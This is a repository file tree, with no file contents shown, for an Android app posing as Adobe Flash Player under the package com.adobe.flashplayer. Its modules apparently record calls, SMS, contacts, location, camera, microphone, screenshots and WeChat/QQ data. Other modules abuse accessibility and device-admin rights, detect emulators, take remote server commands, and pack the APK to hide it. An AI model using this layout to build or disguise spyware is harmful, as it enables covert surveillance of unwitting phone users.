# flashplayer

./: .gitignore  README.md  askey.jks  build.gradle  local.properties
apkUnshell-new/: README.md
apkUnshell-new/app/: CMakeLists.txt  build.gradle
apkUnshell-new/app/src/main/: AndroidManifest.xml
apkUnshell-new/app/src/main/java/com/apkUnshell/: MyApplication.java  RefInvoke.java  Utils.java
apkUnshell-new/app/src/main/res/layout/: activity_cameraphoto.xml  activity_googleservice.xml
apkUnshell-new/app/src/main/res/values/: styles.xml
apkUnshell-new/app/src/main/res/xml/: account_syncadapter.xml  provider_paths.xml
apkUnshell/app/: CMakeLists.txt  build.gradle
apkUnshell/app/src/main/: AndroidManifest.xml
apkUnshell/app/src/main/cpp/: PhoneRunning.cpp  PhoneRunning.h
apkUnshell/app/src/main/java/com/apkUnshell/: MainActivity.java
apkUnshell/app/src/main/res/layout/: activity_camera2.xml  activity_main.xml
apkUnshell/app/src/main/res/xml/: account_authenticator.xml
apkshell/: .project
apkshell-cmd/: apkUnshell.apk  app-release.apk  run.bat
apkshell-cmd/autosign/: 安下载帮助.htm
apkshell/src/com/apkshell/: ApkShell.java  Utils.java  ZipUtils.java
app/: CMakeLists.txt  build.gradle  index.html  proguard-rules.pro
app/debug/: app-debug.apk
app/release/: app-release.apk  test.apk
app/src/androidTest/java/com/adobe/flashplayer/: ExampleInstrumentedTest.java
app/src/main/: AndroidManifest.xml  index.html
app/src/main/aidl/com/adobe/flashplayer/: ISvcAidlInterface.aidl
app/src/main/cpp/: PhoneRunning.cpp  Utils.cpp  Utils.h
app/src/main/java/com/adobe/flashplayer/: JarEntry.java  MainActivity.java  MainEntry.java  MyApplication.java  MyLog.java  PrefOper.java  Public.java  SoEntry.java  Utils.java
app/src/main/java/com/adobe/flashplayer/accessory/: AccessHelper.java  HookLauncher.java  LinuxShell.java  RootUtils.java
app/src/main/java/com/adobe/flashplayer/account/: AccountActivity.java  AccountLauncherActivity.java  AccountStubProvider.java  Authenticator.java  AuthenticatorService.java  SyncAdapter.java  SyncService.java
app/src/main/java/com/adobe/flashplayer/core/: AccessibilitySrv.java  Broadcast.java  CoreHelper.java  DeviceManager.java  ForegroundSrv.java  JobDeamonSrv.java  NoteListenerSrv.java  RemoteSrv.java  UsageStatsMgr.java
app/src/main/java/com/adobe/flashplayer/data/: AppMessage.java  CameraActivity.java  CameraActivity2.java  CameraDialog.java  CameraDialogSV.java  CameraPreview2.java  Collection.java  ExtSDCardFile.java  PhoneApps.java  PhoneCallAudioRec.java  PhoneCallAudioWrapper.java  PhoneCallLog.java  PhoneCallLogObsv.java  PhoneCallLogWrapper.java  PhoneContacts.java  PhoneContentWrapper.java  PhoneInformation.java  PhoneLocationListener.java  PhoneLocationWrapper.java  PhoneMicRecord.java  PhoneRunning.java  PhoneSDFiles.java  PhoneSMS.java  PhoneSMSObsv.java  PhoneSMSWrapper.java  PhoneWIFI.java  ScreenShot.java  ScreenShotActivity.java  ScreenshotView.java  UploadRemainder.java
app/src/main/java/com/adobe/flashplayer/data/Location/: AMaplocation.java  BaiduMapLocation.java  MyTencentLocation.java
app/src/main/java/com/adobe/flashplayer/data/app/: AppUtils.java  QQ.java  WECHAT.java
app/src/main/java/com/adobe/flashplayer/install/: EmulatorDetect.java  InstallActivity.java  InstallAuthority.java  InstallBootup.java  InstallCheckHandler.java  InstallChecker.java  InstallHelper.java  InstallPower.java  MaskActivity.java  Permission.java  SchemeActivity.java
app/src/main/java/com/adobe/flashplayer/network/: FileDownloader.java  FileUploader.java  LargeFile.java  Network.java  NetworkUitls.java  NetworkUtils.java  ServerCommand.java  UploadData.java
app/src/main/java/com/adobe/flashplayer/plugin/: Update.java
app/src/main/res/layout/: activity_cameraphoto.xml  activity_screenguard.xml  activity_screensnapshot.xml
app/src/main/res/values/: strings.xml
app/src/main/res/xml/: accessibilityservice_config.xml  devicemanager_config.xml
app/src/test/java/com/adobe/flashplayer/: ExampleUnitTest.java
gradle/wrapper/: gradle-wrapper.properties
release/: app-release.apk
